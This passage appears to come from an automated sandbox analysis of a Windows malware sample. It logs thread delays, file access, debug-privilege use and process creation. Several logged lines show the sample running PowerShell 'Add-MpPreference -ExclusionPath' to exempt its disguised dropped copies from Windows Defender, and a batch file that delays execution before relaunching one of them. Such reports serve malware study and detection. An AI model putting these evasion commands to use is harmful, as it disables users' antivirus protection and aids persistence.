Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 30000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599871
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599765
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 599655
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598696
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 3600000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598586
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 598125
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 597500
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 596344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595891
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 595109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 594234
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593516
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 593172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 592172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591781
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 591109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590640
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590422
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 590094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589562
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 589109
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588719
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 588266
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587750
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 587250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586672
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 586250
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585922
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585469
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 585062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 584171
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583772
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583564
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583231
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 583050
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582859
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582703
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582536
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582380
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 582094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 300000
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 580047
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579762
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579547
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579344
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 579156
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578969
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578609
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578226
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 578085
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577937
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577734
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577566
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 577031
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576797
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576594
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576404
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 576219
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575968
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575828
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575656
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575437
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575223
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 575094
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574984
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574866
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574731
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574622
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574514
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574406
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574297
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574187
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 574077
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573954
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573810
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573683
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573531
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573418
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573299
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573172
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 573062
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572953
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572841
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 572734
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: w32tm.exe, 0000000E.00000002.1726809984.000002026D769000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe'
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\MoUsoCoreWorker.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\Programs\Accessories\csrss.exe' Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\46FAiS0S6O.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe "C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe"
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerx
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Queries volume information: C:\Users\user\Desktop\fDTPlvsGfH.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
